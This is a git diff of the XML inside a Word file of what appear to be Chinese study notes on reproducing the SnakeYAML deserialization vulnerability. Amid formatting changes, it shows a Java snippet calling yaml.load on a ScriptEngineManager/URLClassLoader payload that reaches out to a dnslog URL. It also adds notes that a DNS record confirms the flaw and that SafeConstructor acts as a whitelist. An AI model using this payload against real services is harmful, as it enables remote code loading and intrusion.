--- a/src/main/java/summary/safe/复现SnakeYml.docx
+++ b/src/main/java/summary/safe/复现SnakeYml.docx
@@ -56,11 +56,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -225,6 +220,37 @@
         <w:t>地址换成自己的</w:t>
       </w:r>
     </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>关键字：h</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ttp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>、</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>ldap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>、rmi</w:t>
+      </w:r>
+    </w:p>
     <w:p/>
     <w:p>
       <w:r>
@@ -235,11 +261,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -1589,6 +1610,16 @@
           <w:color w:val="5067AA"/>
         </w:rPr>
         <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">                </w:t>
       </w:r>
       <w:r>
@@ -1642,12 +1673,6 @@
           <w:color w:val="CC7832"/>
         </w:rPr>
         <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="CC7832"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">            </w:t>
       </w:r>
       <w:r>
@@ -1885,13 +1910,7 @@
         <w:t>}</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+    <w:p/>
     <w:p/>
     <w:p>
       <w:proofErr w:type="spellStart"/>
@@ -2665,30 +2684,448 @@
         <w:rPr>
           <w:color w:val="808080"/>
         </w:rPr>
-        <w:br/>
+        <w:lastRenderedPageBreak/>
+        <w:br/>
+        <w:t xml:space="preserve">            </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="808080"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
+        <w:br/>
         <w:t xml:space="preserve">            </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="C6C45E"/>
+        </w:rPr>
+        <w:t>Yaml</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="C6C45E"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="C66D5E"/>
+        </w:rPr>
+        <w:t>yaml</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="C66D5E"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A8AFBE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">= </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC844F"/>
+        </w:rPr>
+        <w:t xml:space="preserve">new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A8AFBE"/>
+        </w:rPr>
+        <w:t>Yaml</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="808080"/>
         </w:rPr>
+        <w:t xml:space="preserve">          </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
         <w:br/>
         <w:t xml:space="preserve">            </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="C6C45E"/>
-        </w:rPr>
-        <w:t>Yaml</w:t>
+          <w:color w:val="C66D5E"/>
+        </w:rPr>
+        <w:t>yaml</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A8AFBE"/>
+        </w:rPr>
+        <w:t>.load</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="75AA5F"/>
+        </w:rPr>
+        <w:t>"!!</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="75AA5F"/>
+        </w:rPr>
+        <w:t>javax.script.ScriptEngineManager</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="75AA5F"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [!!</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="75AA5F"/>
+        </w:rPr>
+        <w:t>java.net.URLClassLoader</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="75AA5F"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [[!!java.net.URL [http://h08x13.dnslog.cn/]]]]"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t xml:space="preserve">         </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC844F"/>
+        </w:rPr>
+        <w:t>catch</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="C6C45E"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Exception </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="C675B9"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:t>){</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="C6C45E"/>
+        </w:rPr>
+        <w:t>System</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A8AFBE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="9876AA"/>
+        </w:rPr>
+        <w:t>out</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A8AFBE"/>
+        </w:rPr>
+        <w:t>.println</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="C675B9"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A8AFBE"/>
+        </w:rPr>
+        <w:t>.getMessage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:t>())</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">}     </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC844F"/>
+        </w:rPr>
+        <w:t xml:space="preserve">public static void </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="8EC1FF"/>
+        </w:rPr>
+        <w:t>main</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="C6C45E"/>
+        </w:rPr>
+        <w:t>String</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">[] </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="C675B9"/>
+        </w:rPr>
+        <w:t>args</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:t>) {</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="C6C45E"/>
+        </w:rPr>
+        <w:t>TestSnakeYml</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2704,7 +3141,7 @@
         <w:rPr>
           <w:color w:val="C66D5E"/>
         </w:rPr>
-        <w:t>yaml</w:t>
+        <w:t>testSnakeYml</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2730,7 +3167,7 @@
         <w:rPr>
           <w:color w:val="A8AFBE"/>
         </w:rPr>
-        <w:t>Yaml</w:t>
+        <w:t>TestSnakeYml</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2751,109 +3188,16 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:color w:val="808080"/>
-        </w:rPr>
-        <w:t xml:space="preserve">          </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="808080"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="C66D5E"/>
-        </w:rPr>
-        <w:t>yaml</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="A8AFBE"/>
-        </w:rPr>
-        <w:t>.load</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="75AA5F"/>
-        </w:rPr>
-        <w:t>"!!</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="75AA5F"/>
-        </w:rPr>
-        <w:t>javax.script.ScriptEngineManager</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="75AA5F"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> [!!</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="75AA5F"/>
-        </w:rPr>
-        <w:t>java.net.URLClassLoader</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="75AA5F"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> [[!!java.net.URL [http://h08x13.dnslog.cn/]]]]"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="CC7832"/>
-        </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="CC7832"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="808080"/>
-        </w:rPr>
-        <w:t xml:space="preserve">         </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="808080"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">        </w:t>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2867,406 +3211,57 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:color w:val="CC844F"/>
-        </w:rPr>
-        <w:t>catch</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="C6C45E"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Exception </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="C675B9"/>
-        </w:rPr>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:t>){</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="C6C45E"/>
-        </w:rPr>
-        <w:t>System</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="A8AFBE"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="9876AA"/>
-        </w:rPr>
-        <w:t>out</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="A8AFBE"/>
-        </w:rPr>
-        <w:t>.println</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="C675B9"/>
-        </w:rPr>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="A8AFBE"/>
-        </w:rPr>
-        <w:t>.getMessage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:t>())</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="CC7832"/>
-        </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="CC7832"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:t xml:space="preserve">}     </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="CC844F"/>
-        </w:rPr>
-        <w:t xml:space="preserve">public static void </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="8EC1FF"/>
-        </w:rPr>
-        <w:t>main</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="C6C45E"/>
-        </w:rPr>
-        <w:t>String</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:t xml:space="preserve">[] </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="C675B9"/>
-        </w:rPr>
-        <w:t>args</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:t>) {</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="C6C45E"/>
-        </w:rPr>
-        <w:t>TestSnakeYml</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="C6C45E"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="C66D5E"/>
-        </w:rPr>
-        <w:t>testSnakeYml</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="C66D5E"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="A8AFBE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">= </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="CC844F"/>
-        </w:rPr>
-        <w:t xml:space="preserve">new </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="A8AFBE"/>
-        </w:rPr>
-        <w:t>TestSnakeYml</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:t>()</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="CC7832"/>
-        </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="CC7832"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="CC7832"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="5067AA"/>
+        </w:rPr>
+        <w:br/>
         <w:t>}</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>}</w:t>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>dnslog</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>执行结果</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>有解析记录说明域名被访问 存在漏洞</w:t>
+      </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>dnslog</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>执行结果</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>有解析记录说明域名被访问 存在漏洞</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AE830A8" wp14:editId="7370EA1E">
             <wp:extent cx="5274310" cy="3493770"/>
@@ -3429,6 +3424,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>就会检测到内容有问题</w:t>
       </w:r>
     </w:p>
@@ -3438,6 +3434,20 @@
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>SafeConstruct</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>类充当了白名单的作用</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
